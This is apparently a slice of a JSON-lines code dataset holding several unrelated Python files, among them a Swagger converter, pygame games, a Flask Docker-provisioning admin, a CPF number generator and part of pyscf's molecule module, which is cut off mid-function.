None\n path = None\n root = None #: root swagger object\n\n def __init__(self, obj, method, path, root, path_params=None):\n self.method = 
method\n self.path = path\n self.root = root\n\n self.operation_id = obj.get(\n 'operationId', self.get_operation_id(method, path))\n\n self.summary = obj.get('summary')\n self.description = obj.get('description')\n self.consumes = obj.get('consumes', self.root.consumes)\n self.produces = obj.get('produces', self.root.produces)\n self.schemes = obj.get('schemes', self.root.schemes)\n self._fill_parameters(obj.get('parameters', []), path_params)\n self._fill_responses(obj['responses'])\n\n self.deprecated = obj.get('deprecated', False)\n\n self.tags = obj.get('tags', ['default'])\n self.external_docs = obj.get('externalDocs')\n\n if 'security' in obj:\n self._fill_securities(obj['security'])\n\n @staticmethod\n def get_operation_id(method, path):\n op_id = '{}_{}'.format(method, path)\n\n # copy-paste from swagger-js\n op_id = re.sub('[\\s!@#$%^&*()+=\\[{\\]};:<>|./?,\\'\"-]', '_', op_id)\n op_id = re.sub('(_){2,}', '_', op_id)\n op_id = re.sub('^[_]*', '', op_id)\n op_id = re.sub('([_]*)$', '', op_id)\n\n return op_id\n\n def _fill_parameters(self, params, path_params):\n self.parameters = []\n for obj in params:\n if '$ref' in obj:\n self.parameters.append(self.root.parameter_definitions[obj['$ref']])\n else:\n self.parameters.append(\n Parameter(obj, name=obj['name'], root=self.root))\n if path_params:\n self.parameters += path_params\n if len(self.get_parameters_by_location(['body'])) > 1:\n raise ConverterError(\n 'Invalid source file: More than one body parameters in %s' % self.path)\n\n def _fill_responses(self, responses):\n self.responses = {}\n for code, obj in responses.items():\n if '$ref' in obj:\n self.responses[code] = self.root.response_definitions[obj['$ref']]\n else:\n self.responses[code] = Response(obj, name=code, root=self.root)\n\n def get_parameters_by_location(self, locations=None, excludes=None):\n \"\"\" Get parameters list by location\n\n :param locations: list of locations\n :type locations: list or None\n :param excludes: list of excludes locations\n :type excludes: list or None\n :return: list of Parameter\n :rtype: list\n \"\"\"\n result = self.parameters\n if locations:\n result = filter(lambda x: x.location_in in locations, result)\n if excludes:\n result = filter(lambda x: x.location_in not in excludes, result)\n return list(result)\n\n @cached_property\n def body(self):\n \"\"\" Return body request parameter\n\n :return: Body parameter\n :rtype: Parameter or None\n \"\"\"\n body = self.get_parameters_by_location(['body'])\n return self.root.schemas.get(body[0].type) if body else None\n\n\nclass AbstractTypeObject(object):\n\n _type = None\n type_format = None\n properties = None\n item = None #: set if type is array\n\n def __init__(self, obj, name, root, **kwargs):\n self.raw = obj\n self.name = name\n self.root = root\n\n def get_type_properties(self, property_obj, name):\n \"\"\" Get internal properties of property\n\n :param dict property_obj: raw property object\n :param str name: name of property\n :return: Type, format and internal properties of property\n :rtype: tuple(str, str, dict)\n \"\"\"\n property_type = property_obj.get('type', 'object')\n property_format = property_obj.get('format')\n property_dict = dict()\n\n if property_type in ['object', 'array']:\n schema_id = self._get_object_schema_id(property_obj, SchemaTypes.INLINE)\n if not ('$ref' in property_obj or SchemaObjects.get(schema_id)):\n _schema = SchemaObjects.create_schema(\n property_obj, name, SchemaTypes.INLINE, root=self.root)\n self._after_create_schema(_schema)\n property_type 
= schema_id\n\n if 'default' in property_obj:\n property_dict['default'] = property_obj['default']\n\n if 'maximum' in property_obj:\n property_dict['maximum'] = property_obj['maximum']\n property_dict['exclusive_maximum'] = property_obj.get('exclusiveMaximum', False)\n\n if 'minimum' in property_obj:\n property_dict['minimum'] = property_obj['minimum']\n property_dict['exclusive_minimum'] = property_obj.get('exclusiveMinimum', False)\n\n if 'maxLength' in property_obj:\n property_dict['max_length'] = property_obj['maxLength']\n\n if 'minLength' in property_obj:\n property_dict['min_length'] = property_obj['minLength']\n\n if 'enum' in property_obj:\n property_dict['enum'] = property_obj['enum']\n\n return property_type, property_format, property_dict\n\n @staticmethod\n def _get_id(base):\n m = md5()\n m.update(base.encode('utf-8'))\n return m.hexdigest()\n\n def _get_object_schema_id(self, obj, schema_type):\n if '$ref' in obj:\n base = obj['$ref']\n prefix = SchemaTypes.prefixes[SchemaTypes.DEFINITION]\n else:\n base = json.dumps(obj)\n prefix = SchemaTypes.prefixes[schema_type]\n return '{}_{}'.format(prefix, self._get_id(base))\n\n def set_type_by_schema(self, schema_obj):\n \"\"\"\n Set property type by schema object\n Schema will create, if it doesn't exists in collection\n\n :param dict schema_obj: raw schema object\n \"\"\"\n schema_id = self._get_object_schema_id(schema_obj, SchemaTypes.INLINE)\n\n # TODO:\n if schema_obj.get('additionalProperties'):\n self._type = 'object'\n return\n if not SchemaObjects.contains(schema_id):\n schema = SchemaObjects.create_schema(\n schema_obj, self.name, SchemaTypes.INLINE, root=self.root)\n assert schema.schema_id == schema_id\n self._type = schema_id\n\n def _after_create_schema(self, schema):\n pass\n\n @property\n def type(self):\n return self._type\n\n @property\n def is_array(self):\n return self._type == 'array'\n\n\nclass Parameter(AbstractTypeObject):\n \"\"\" Represents Swagger Parameter Object\n \"\"\"\n def __init__(self, obj, **kwargs):\n super(Parameter, self).__init__(obj, **kwargs)\n self.location_in = obj['in']\n self.required = obj.get('required', False)\n self.description = obj.get('description', '')\n self.default = obj.get('default')\n self.collection_format = obj.get('collectionFormat')\n\n self._set_type()\n\n def _set_type(self):\n if 'type' in self.raw:\n self._type = self.raw['type']\n self.type_format = self.raw.get('format')\n if self.is_array:\n self.item = dict(zip(\n ('type', 'type_format', 'type_properties'),\n self.get_type_properties(self.raw['items'], self.name)))\n else:\n _, _, self.properties = self.get_type_properties(self.raw, self.name)\n elif 'schema' in self.raw:\n self.set_type_by_schema(self.raw['schema'])\n else:\n raise ConverterError('Invalid structure')\n\n @property\n def type(self):\n if self.is_array:\n return 'array of {}'.format(self.item['type'])\n else:\n return self._type\n\n def __repr__(self):\n return '{}_{}'.format(self.location_in, self.name)\n\n\nclass Response(AbstractTypeObject):\n \"\"\" Represents Swagger Response Object\n \"\"\"\n headers = None\n examples = None\n\n def __init__(self, obj, **kwargs):\n super(Response, self).__init__(obj, **kwargs)\n self.description = obj['description']\n self.examples = obj.get('examples')\n\n if 'schema' in obj:\n self._set_type()\n\n if 'headers' in obj:\n self.headers = {name: Header(header, name=name, root=self.root)\n for name, header in obj['headers'].items()}\n\n def _set_type(self):\n if 'type' in self.raw['schema'] and 
self.raw['schema']['type'] in PRIMITIVE_TYPES:\n self._type = self.raw['schema']['type']\n self.type_format = self.raw['schema'].get('format')\n _, _, self.properties = self.get_type_properties(self.raw, self.name)\n else:\n self.set_type_by_schema(self.raw['schema'])\n\n\nclass Header(AbstractTypeObject):\n \"\"\" Represents Swagger Header Object\n \"\"\"\n\n def __init__(self, obj, **kwargs):\n super(Header, self).__init__(obj, **kwargs)\n self.description = obj.get('description')\n self._set_type()\n\n def _set_type(self):\n self._type = self.raw['type']\n if self._type not in PRIMITIVE_TYPES and self._type != 'array':\n raise ConverterError(\n 'Invalid type of response header {}'.format(self.name))\n\n self.type_format = self.raw.get('format')\n if self.is_array:\n self.item = dict(zip(\n ('type', 'type_format', 'type_properties'),\n self.get_type_properties(self.raw['items'], self.name)))\n else:\n _, _, self.properties = self.get_type_properties(self.raw, self.name)\n\n\nclass Schema(AbstractTypeObject):\n \"\"\" Represents Swagger Schema Object\n \"\"\"\n schema_id = None\n schema_type = None #: definition or inline\n ref_path = None #: path for definition schemas\n nested_schemas = None\n all_of = None\n\n def __init__(self, obj, schema_type, **kwargs):\n\n assert schema_type in SchemaTypes.prefixes\n super(Schema, self).__init__(obj, **kwargs)\n self.nested_schemas = set()\n self.schema_type = schema_type\n self._type = obj.get('type', 'object')\n # assert self._type in ('array', 'object')\n\n self.type_format = obj.get('format')\n self.schema_example = obj.get('example')\n self.read_only = obj.get('readOnly', False)\n self.external_docs = obj.get('externalDocs')\n\n if self._type in PRIMITIVE_TYPES:\n self.properties = [{\n 'name': kwargs.get('name', ''),\n 'description': '',\n 'required': obj.get('required', False),\n 'type': self.type,\n 'type_format': self.type_format,\n 'type_properties': self.get_type_properties(obj, '')[2],\n }]\n\n if schema_type != SchemaTypes.INLINE:\n self.ref_path = '#/definitions/{}'.format(self.name)\n\n if self.is_array:\n self.item = dict(zip(\n ('type', 'type_format', 'type_properties'),\n self.get_type_properties(obj['items'], self.name)\n ))\n self.name += '_array'\n if self.item['type'] not in PRIMITIVE_TYPES:\n self.nested_schemas.add(self.item['type'])\n\n if 'properties' in obj:\n # self.example = dict()\n self._set_properties()\n\n if 'allOf' in obj:\n self.all_of = []\n for _obj in obj['allOf']:\n _id = self._get_object_schema_id(_obj, SchemaTypes.INLINE)\n if not SchemaObjects.contains(_id):\n schema = SchemaObjects.create_schema(\n _obj, 'inline', SchemaTypes.INLINE, self.root)\n assert schema.schema_id == _id\n self.all_of.append(_id)\n self.nested_schemas.add(_id)\n\n self._set_schema_id()\n\n def _set_schema_id(self):\n _id = self._get_id(self.ref_path or json.dumps(self.raw))\n self.schema_id = '{}_{}'.format(\n SchemaTypes.prefixes[self.schema_type], _id)\n\n def _set_properties(self):\n self.properties = []\n required_fields = self.raw.get('required', [])\n\n for name, property_obj in self.raw['properties'].items():\n\n property_type, property_format, prop = self.get_type_properties(property_obj, name)\n if property_type not in PRIMITIVE_TYPES:\n self.nested_schemas.add(property_type)\n\n _obj = {\n 'name': name,\n 'description': '',\n 'required': name in required_fields,\n 'type': property_type,\n 'type_format': property_format,\n 'type_properties': prop,\n\n }\n if 'description' in property_obj:\n _obj['description'] = 
property_obj['description'].replace('\"', '\\'')\n\n self.properties.append(_obj)\n\n def _after_create_schema(self, schema):\n if not self.is_array:\n self.nested_schemas |= schema.nested_schemas\n\n @property\n def is_inline(self):\n return self.schema_type == SchemaTypes.INLINE\n\n @property\n def is_inline_array(self):\n return self.is_inline and self.is_array\n\n def __repr__(self):\n return self.name\n\n\nclass SecurityDefinition(object):\n \"\"\" Represents Swagger Security Scheme Object\n \"\"\"\n scopes = None\n location_in = None\n param_name = None\n flow = None\n auth_url = None\n token_url = None\n\n def __init__(self, name, obj):\n\n self.name = name\n self.type = obj['type']\n assert self.type in SecurityTypes.names\n\n self.description = obj.get('description', '')\n self.raw = obj\n\n if self.type == SecurityTypes.API_KEY:\n self.location_in = obj['in']\n self.param_name = obj['name']\n elif self.type == SecurityTypes.OAUTH2:\n self.flow = obj['flow']\n assert self.flow in ('implicit', 'password', 'application', 'accessCode')\n\n if self.flow in ('implicit', 'accessCode'):\n self.auth_url = obj['authorizationUrl']\n if self.flow in ('password', 'accessCode', 'application'):\n self.token_url = obj['tokenUrl']\n\n self.scopes = obj['scopes']\n\n @property\n def type_name(self):\n return SecurityTypes.names[self.type]\n","repo_name":"IIKovalenko/swagger2rst","sub_path":"swg2rst/swagger.py","file_name":"swagger.py","file_ext":"py","file_size_in_byte":35142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"36525159338","text":"import pygame\nfrom pygame import Rect, key, mouse, transform\n\nfrom characters.character import Character\n\n\nclass Knight(Character):\n GRAVITY_VELOCITY = 1\n MOVEMENT_VELOCITY = 4\n\n def __init__(self, x, y, idle, walk, attack, hurt, death, jump, clouds: list, screen_height):\n super().__init__(x, y, idle, walk, attack, death)\n self.rect: Rect = self.image.get_rect(midbottom=(x, y)).inflate(0, -4)\n self.jump_image = jump\n self.hurt_images = hurt\n self.clouds = clouds\n self.gravity = 0\n self.attack_timer = 0\n self.health = 3\n self.colliding = False\n self.going_right = True\n self.moved = False\n self.attacking = False\n self.damaged = False\n self.screen_height = screen_height\n\n @classmethod\n def create_knight(cls, cloud_coordinates: Rect, idle, walk, attack, hurt, death, jump: pygame.image, clouds: list,\n screen_height):\n x, y = cloud_coordinates.x + cloud_coordinates.width // 2, cloud_coordinates.top\n return cls(x, y, idle, walk, attack, hurt, death, jump, clouds, screen_height)\n\n @property\n def coordinates(self):\n return self.rect.x, self.rect.y\n\n @property\n def health(self):\n return self.__health\n\n @health.setter\n def health(self, value):\n if 0 <= value <= 3:\n self.__health = value\n else:\n self.__health = 3\n\n def movement(self):\n keys = key.get_pressed()\n if any((keys[pygame.K_a], keys[pygame.K_d], keys[pygame.K_SPACE] and self.colliding)):\n if keys[pygame.K_a]:\n self.rect.x -= self.MOVEMENT_VELOCITY\n self.going_right = False\n if self.colliding:\n self.image, self.walk_index = self.animation(self.going_right, self.walk_images, self.walk_index)\n else:\n self.image, self.walk_index = transform.flip(self.jump_image, True, False), self.walk_index\n if keys[pygame.K_d]:\n self.rect.x += self.MOVEMENT_VELOCITY\n self.going_right = True\n if self.colliding:\n self.image, self.walk_index = self.animation(self.going_right, self.walk_images, self.walk_index)\n else:\n 
self.image, self.walk_index = self.jump_image, self.walk_index\n            if keys[pygame.K_SPACE] and self.colliding:\n                self.gravity = -17\n                self.image = self.jump_image if self.going_right else transform.flip(self.jump_image, True, False)\n            self.moved = True\n\n    def attack(self):\n        keys = key.get_pressed()\n\n        if (keys[pygame.K_f] or mouse.get_pressed()[0]) and self.attack_timer == 0:\n            self.attack_timer = 60\n            self.attacking = True\n\n        if self.attacking:\n            self.image, self.attack_index = self.animation(self.going_right, self.attack_images, self.attack_index,\n                                                           0.15)\n            if self.attack_index + 0.15 >= len(self.attack_images):\n                self.attacking = False\n\n        if self.attack_timer > 0:\n            self.attack_timer -= 1\n\n    def apply_gravity(self):\n        self.gravity += self.GRAVITY_VELOCITY\n        self.rect.y += self.gravity\n        self.collision()\n\n    def collision(self):\n        for cloud in self.clouds:\n            if self.rect.colliderect(cloud) and self.rect.bottomright[0] - self.rect.width // 2 > cloud.topleft[0]:\n                self.rect.midbottom = (self.rect.midbottom[0], cloud.midtop[1])\n                self.gravity = 0\n                self.colliding = True\n                break\n        else:\n            self.colliding = False\n\n    def hurt(self):\n        self.image, self.hurt_index = self.animation(self.going_right, self.hurt_images, self.hurt_index)\n        self.damaged = True\n\n    def check_for_player_out_of_game_range(self):\n        if self.rect.y - 1000 >= self.screen_height:\n            self.health = 0\n\n    def update(self):\n        self.apply_gravity()\n        if self.damaged:\n            if self.hurt_index + 0.1 < len(self.hurt_images):\n                self.hurt()\n                return\n            self.damaged = False\n            self.health -= 1\n        self.movement()\n        self.check_for_player_out_of_game_range()\n        self.attack()\n        if not self.moved and not self.attacking and self.colliding:\n            self.image, self.idle_index = self.animation(self.going_right, self.idle_images, self.idle_index, 0.03)\n        self.moved = False if self.colliding else True\n","repo_name":"DanieII/SkyKnight","sub_path":"characters/knight.py","file_name":"knight.py","file_ext":"py","file_size_in_byte":4632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} {"seq_id":"20963568432","text":"#!/usr/bin/env python3\n\nimport argparse\nimport subprocess\nimport glob\nimport os\nimport threading\nimport time\nimport signal\n\nfrom ExprParser import ExprParser\nfrom AppRunner import AppRunner\nfrom LogUtil import clear_log_files\nimport shlex\ndef run_apps(app_schedules,cpu_check,debug):\n    now = time.time()\n    for app_schedule in app_schedules:\n        print('app_schedule: ',end='')\n        print(app_schedule)\n    app_runners = []\n    for app_schedule in app_schedules:\n        # init cmd doesn't require schedule\n        schedule = app_schedule\n        app_runners.append(AppRunner(schedule,\n                                    now,\n                                    debug=debug))\n    if(cpu_check):\n        # Execute CpuUtilization\n        cpu_cmd=shlex.split(os.getcwd()+'/tools/getCpuUtil.py')\n        cpu_thread = subprocess.Popen(cpu_cmd,stdout=subprocess.PIPE,universal_newlines=True)\n\n    # Run Scheduled Experiment\n    for i,app_runner in enumerate(app_runners):\n        app_runner.start()\n\n    for i,app_runner in enumerate(app_runners):\n        return_app=app_runner.join()\n\n\n\n    if(cpu_check):\n        # Kill CpuUtilization\n        if(cpu_thread.poll()==None):\n            cpu_thread.send_signal(signal.SIGINT)\n        try:\n            out, err=cpu_thread.communicate()\n        except subprocess.SubprocessError as err:  # bind the exception so it can be reported\n            print('[INFO] CPU Check Error! ' + str(err))\n        if(debug):\n            print('[INFO] Cpu Utilization Check End!')\n\n    \n    if(debug):\n        print('[INFO] Execute End')\n\n    return app_runners\n\ndef run_expr(expr_schedule,scenario,cpu_check,debug=False):\n\n    # run experiment apps\n    run_apps(expr_schedule,cpu_check,debug)\n\n\nif __name__ == \"__main__\":\n    scenario= ExprParser()\n    \n    expr_schedule = scenario.expr_schedule\n    debug=scenario.debug\n    cpu_check=scenario.cpu_check\n\n    run_expr(expr_schedule,scenario,cpu_check,debug)","repo_name":"markyang92/experiment_tool","sub_path":"script/exp_script/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} {"seq_id":"10348578256","text":"from funcoes_e_variaveis import texto, titulo, mostra_todos_servicos, mostra_profissionais, conectar, encerrar_conexao, \\\n    agendamento_cadastro_cliente, agendamento_escolha_servico_e_profissional, funcao_marcacao_data_e_horario, \\\n    funcao_confirmacao_do_pedido_feito, adicao_de_servico, insere_clientes, insere_agendamentos, apresentacao_pedido, \\\n    consulta_clientes_bd, add_cliente, edita_cliente, exclui_clientes, procura_cliente_especifico, edita_agendamento, \\\n    exclui_agendamentos, funcao_menu_edicao_dos_clientes\n\nglobal con\n########################################################################################################\n                    # PART 1 of 2\n########################################################################################################\n\nwhile True:\n\n    confirmacao_pedido = funcao_confirmacao_do_pedido_feito()\n\n    add_servico = adicao_de_servico()\n    if add_servico == 'N':\n        break\n\ntitulo('ALL DONE. SEE YOU LATER.')\n\nif confirmacao_pedido == 'S' and add_servico == 'N': # INSERT DATA INTO THE DB:\n\n    insere_clientes() # INSERT DATA INTO THE CLIENTS TABLE:\n    insere_agendamentos() # INSERT DATA INTO THE APPOINTMENTS TABLE:\n\n########################################################################################################\n                    # PART 2 of 2\n#########################################################################################################\n# EDITING CLIENTS AND APPOINTMENTS: # database only\n\n# EDIT MENU\nfuncao_menu_edicao_dos_clientes()\n","repo_name":"renan-israel/PROJETO-AGENDA","sub_path":"arquivos Python/sistema.py","file_name":"sistema.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} {"seq_id":"30992386166","text":"from bci.database.mongo.mongodb import MongoDB\n\n\nclass CustomMongoDB(MongoDB):\n\n    def __init__(self):\n        super().__init__()\n        self.data_collection_names = {\n            \"chromium\": \"custom_chromium_data_test\",\n            \"firefox\": \"custom_firefox_release_data_test\"\n        }\n\n    def __get_data_collection(self, browser_name: str):\n        collection_name = self.data_collection_names[browser_name]\n        if collection_name not in self.db.collection_names():\n            raise AttributeError(\"Collection '%s' not found in database\" % collection_name)\n        return self.db[collection_name]\n","repo_name":"DistriNet/BugHog","sub_path":"bci/evaluations/custom/custom_mongodb.py","file_name":"custom_mongodb.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} {"seq_id":"14637035614","text":"from flask import Flask, request\nfrom flask import jsonify\nfrom clients import ClientDocker\nfrom config import admin_config\n\nENV = 'development'\nadmin = Flask(__name__)\nconfig = admin_config[ENV]()\nimage_map = config.image_map\ncld = ClientDocker(config.docker_url)\n\n# helper functions\ndef request_image_mapper(request):\n    image = image_map[request['type']][request['distribution']]['image']\n    port = image_map[request['type']][request['distribution']]['default_port']\n    volume = image_map[request['type']][request['distribution']]['data_location']\n    env_vars = image_map[request['type']][request['distribution']]['env_vars']\n\n    return image, port, volume, env_vars\n\n
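# default_port arrives as a one-element sequence (e.g. ['5432']); Docker keys its\n# published-port mappings as '5432/tcp'. When the container already exists\n# (found=True) the mapped HostPort is unwrapped, otherwise the raw mapping from\n# the fresh provision call appears to be passed through as-is.\n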
def handle_port_response(port_dict, default_port, found):\n    default_port = default_port[0] + '/tcp'\n    if found:\n        port = port_dict[default_port][0]['HostPort']\n    else:\n        port = port_dict[default_port]\n    \n    return port\n\n# Routes\n@admin.route('/')\ndef index():\n    return 'Hello World!'\n\n@admin.route('/get_all_containers')\ndef get_all_containers():\n    return jsonify(cld.get_all_containers())\n\n@admin.route('/get_active_containers')\ndef get_active_containers():\n    return jsonify(cld.get_active_containers())\n\n@admin.route('/get_active_container_ports')\ndef get_active_container_ports():\n    return jsonify(cld.get_active_container_ports())\n\n@admin.route('/get_all_container_ports')\ndef get_all_container_ports():\n    return jsonify(cld.get_all_container_ports())\n\n@admin.route('/provision_container', methods=['POST'])\ndef provision_container():\n    req_json = request.get_json()\n    image, port, volume, env_vars = request_image_mapper(req_json)\n    cntr_id = cld.provision_container(image, port, volume, env_vars)\n\n    return f'{cntr_id}'\n\n@admin.route('/provide_db', methods=['POST'])\ndef provide_db():\n    req_json = request.get_json()\n    image, port, volume, env_vars = request_image_mapper(req_json)\n    # check whether a new instance is required\n    new = True if req_json['new'] == 'yes' else False\n    if new:\n        # provision container and return name, container, ports\n        cntr_resp = cld.provision_container(image, port, volume, env_vars)\n        resp_obj = cntr_resp\n        resp_obj['port'] = handle_port_response(resp_obj['port'], port, False)\n    else:\n        query_name = req_json['distribution'] + '-' + req_json['instance'].zfill(2)\n        container_query_result = cld.get_container(query_name)\n\n        if bool(container_query_result['exists']):\n            # check status\n            if container_query_result['status'] == 'running':\n                resp_obj = {\n                    'name': container_query_result['name'],\n                    'id': container_query_result['id'],\n                    'port': handle_port_response(container_query_result['ports'], port, True)\n                }\n            elif container_query_result['status'] == 'exited':\n                # pass the container id\n                container_resp = cld.start_container(container_query_result['id'])\n                # return the response object\n                resp_obj = container_resp\n                resp_obj['port'] = handle_port_response(resp_obj['port'], port, True)\n            else:\n                raise ValueError('Unknown container status')\n        else:\n            # provision new container and return name, container, ports\n            cntr_resp = cld.provision_container(image, port, volume, env_vars)\n            resp_obj = cntr_resp\n            resp_obj['port'] = handle_port_response(resp_obj['port'], port, False)\n\n    return jsonify(resp_obj)\n\nif __name__ == '__main__':\n    admin.run(debug=True)","repo_name":"gsam1/scraper-hub","sub_path":"admin/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} {"seq_id":"42914821161","text":"import re\r\nimport pygame\r\n\r\nimport config\r\nfrom data import Graph\r\nfrom geometric import Point, Line\r\n\r\n# read the shapes and points from the file\r\ndiagonals = list()\r\nlines = list()\r\n\r\ngraph = Graph()\r\nwith open(config.cache_line, 'r') as file:\r\n    x_s, y_s, x_e, y_e = map(float, re.findall(r\"\\d+.\\d+\", file.readline()))\r\n    point_start = Point(x_s, y_s)\r\n    point_end = Point(x_e, y_e)\r\n\r\n    graph.addTop(point_start)\r\n    graph.addTop(point_end)\r\n    new_line = file.readline()\r\n    for point_str in new_line.split(\";\"):\r\n        x, y = map(float, re.findall(r\"\\d+.\\d+\", point_str))\r\n        point = Point(x, y)\r\n        graph.addTop(point)\r\n\r\n    new_line = file.readline()\r\n    for line_str in new_line.split(\";\"):\r\n        x1, y1, x2, y2 = map(float, re.findall(r\"\\d+.\\d+\", line_str))\r\n        p1 = Point(x1, y1)\r\n        p2 = Point(x2, y2)\r\n\r\n        line = Line(p1, p2)\r\n\r\n        lines.append(line)\r\n\r\n    new_line = file.readline()\r\n    for diagonal_str in new_line.split(\";\"):\r\n        x1, y1, x2, y2 = map(float, re.findall(r\"\\d+.\\d+\", diagonal_str))\r\n        diagonals.append(Line(Point(x1, y1), Point(x2, y2)))\r\n        continue\r\n\r\n# full construction of the graph\r\nwith open(config.cache_graph, 'r') as file:\r\n    n = int(file.readline())\r\n\r\n    for i in range(n):\r\n        arcs = file.readline()\r\n        for arc in arcs.split(\";\"):\r\n            num1, num2 = arc.split(\",\")\r\n            num1 = int(num1)\r\n            num2 = float(num2)\r\n\r\n            graph.connect(i, num1, num2)\r\n\r\n# read the computed path\r\nwith open(config.cache_way, 'r') as file:\r\n    weight = file.readline()\r\n\r\n    new_line = file.readline()\r\n    way = list(map(int, new_line.split(',')))\r\n\r\npygame.init()\r\ndisplay = pygame.display.set_mode((1080, 600))\r\npygame.display.update()\r\n\r\nscale = config.scale\r\n\r\ngame_run = True\r\nwhile game_run:\r\n    for event in pygame.event.get():\r\n        if event.type == pygame.QUIT:\r\n            game_run = False\r\n\r\n    for d in diagonals:\r\n        pygame.draw.line(display, (125, 125, 125), d.point1.getXY(scale), d.point2.getXY(scale), 6)\r\n\r\n    for l in lines:\r\n        pygame.draw.line(display, (125, 125, 125), l.point1.getXY(scale), l.point2.getXY(scale), 5)\r\n\r\n    for p in graph.tops:\r\n        pygame.draw.circle(display, (255, 255, 0), p.getXY(scale), 3)\r\n\r\n    for num, indexes in enumerate(graph.connections):\r\n        for index in indexes:\r\n            pygame.draw.line(display, (0, 255, 0), graph.tops[num].getXY(scale), graph.tops[index.key].getXY(scale), 2)\r\n\r\n    num = 1\r\n    while num < len(way):\r\n        pygame.draw.line(display, (255, 0, 0), graph.tops[way[num - 1]].getXY(scale),\r\n                 graph.tops[way[num]].getXY(scale), 6)\r\n        num += 1\r\n\r\n    pygame.draw.circle(display, (0, 0, 255), point_start.getXY(scale), 5)\r\n    pygame.draw.circle(display, (255, 255, 255), point_end.getXY(scale), 5)\r\n\r\n    pygame.time.wait(1)\r\n    pygame.display.update()\r\n\r\npygame.quit()\r\nquit()","repo_name":"RomanGhost/GraphVisible","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} {"seq_id":"15174188261","text":"from random import randint\n\nnove_digitos = ''\n\nfor i in range(9):\n    nove_digitos += str(randint(0, 9))\n\nmult_1 = 10\nresultado_1 = 0\n\nfor digito in nove_digitos:\n    resultado_1 += int(digito) * mult_1\n    mult_1 -= 1\n\ndigito_1 = resultado_1 * 10 % 11\ndigito_1 = digito_1 if digito_1 <= 9 else 0\n\ndez_digitos = nove_digitos + str(digito_1)\n\nmult_2 = 11\nresultado_2 = 0\n\nfor digito in dez_digitos:\n    resultado_2 += int(digito) * mult_2\n    mult_2 -= 1\n\ndigito_2 = resultado_2 * 10 % 11\ndigito_2 = digito_2 if digito_2 <= 9 else 0\n\n
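# Brazilian CPF check digits use a mod-11 scheme, as implemented above: the base\n# digits are weighted 10..2 (then 11..2 for the second pass), the check digit is\n# (weighted sum * 10) % 11, and a result of 10 collapses to 0.\n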
cpf = f'{nove_digitos}{digito_1}{digito_2}'\n\nprint(cpf)","repo_name":"Igor-Nunes-Fontoura/Python","sub_path":"Exercicios_Python/aula067.py","file_name":"aula067.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} {"seq_id":"2702016717","text":"#!/usr/bin/env python\n# -*- coding: utf-8\n#\n# Author: Qiming Sun \n#\n\nimport os, sys\nimport platform\nimport gc\nimport time\nimport math\nimport json\nimport numpy\nimport scipy.special\nimport ctypes\nimport pyscf.lib\nimport pyscf.lib.parameters as param\nfrom pyscf.lib import logger\nfrom pyscf.gto import cmd_args\nfrom pyscf.gto import basis\nfrom pyscf.gto import moleintor\nfrom pyscf.gto.eval_gto import eval_gto\nimport pyscf.gto.ecp\n\n\ndef M(**kwargs):\n    r'''This is a shortcut to build up Mole object.\n\n    Args: Same to :func:`Mole.build`\n\n    Examples:\n\n    >>> from pyscf import gto\n    >>> mol = gto.M(atom='H 0 0 0; F 0 0 1', basis='6-31g')\n    '''\n    mol = Mole()\n    mol.build(**kwargs)\n    return mol\n\ndef _gaussian_int(n, alpha):\n    r'''int_0^inf x^n exp(-alpha x^2) dx'''\n    n1 = (n + 1) * .5\n    return scipy.special.gamma(n1) / (2. * alpha**n1)\n\ndef gto_norm(l, expnt):\n    r'''Normalization factor for GTO radial part :math:`g=r^l e^{-\\alpha r^2}`\n\n    .. math::\n\n        \\frac{1}{\\sqrt{\\int g^2 r^2 dr}}\n        = \\sqrt{\\frac{2^{2l+3} (l+1)! (2a)^{l+1.5}}{(2l+2)!\\sqrt{\\pi}}}\n\n    Ref: H. B. Schlegel and M. J. Frisch, Int. J. Quant. Chem., 54(1995), 83-87.\n\n    Args:\n        l (int):\n            angular momentum\n        expnt :\n            exponent :math:`\\alpha`\n\n    Returns:\n        normalization factor\n\n    Examples:\n\n    >>> print gto_norm(0, 1)\n    2.5264751109842591\n    '''\n    if l >= 0:\n        #f = 2**(2*l+3) * math.factorial(l+1) * (2*expnt)**(l+1.5) \\\n        #        / (math.factorial(2*l+2) * math.sqrt(math.pi))\n        #return math.sqrt(f)\n        return 1/numpy.sqrt(_gaussian_int(l*2+2, 2*expnt))\n    else:\n        raise ValueError('l should be >= 0')\n\ndef cart2sph(l):\n    '''Cartesian to real spheric transformation matrix'''\n    nf = (l+1)*(l+2)//2\n    cmat = numpy.eye(nf)\n    if l in (0, 1):\n        return cmat\n    else:\n        nd = l * 2 + 1\n        c2sph = numpy.zeros((nf,nd), order='F')\n        fn = moleintor.libcgto.CINTc2s_ket_sph\n        fn(c2sph.ctypes.data_as(ctypes.c_void_p), ctypes.c_int(nf),\n           cmat.ctypes.data_as(ctypes.c_void_p), ctypes.c_int(l))\n        return c2sph\n\ndef cart2j_kappa(kappa):\n    '''Cartesian to spinor, indexed by kappa'''\n    assert(kappa != 0)\n    if kappa < 0:\n        l = -kappa - 1\n        nd = l * 2 + 2\n    else:\n        l = kappa\n        nd = l * 2\n    nf = (l+1)*(l+2)//2\n    c2sph = numpy.zeros((nf,nd), order='F', dtype=numpy.complex)\n    cmat = numpy.eye(nf)\n    # NOTE: assumes libcgto exports a cartesian-to-spinor transform analogous to\n    # CINTc2s_ket_sph used in cart2sph above; the exact symbol is an assumption.\n    fn = moleintor.libcgto.CINTc2s_ket_spinor\n    fn(c2sph.ctypes.data_as(ctypes.c_void_p), ctypes.c_int(nf),\n       cmat.ctypes.data_as(ctypes.c_void_p), ctypes.c_int(l),\n       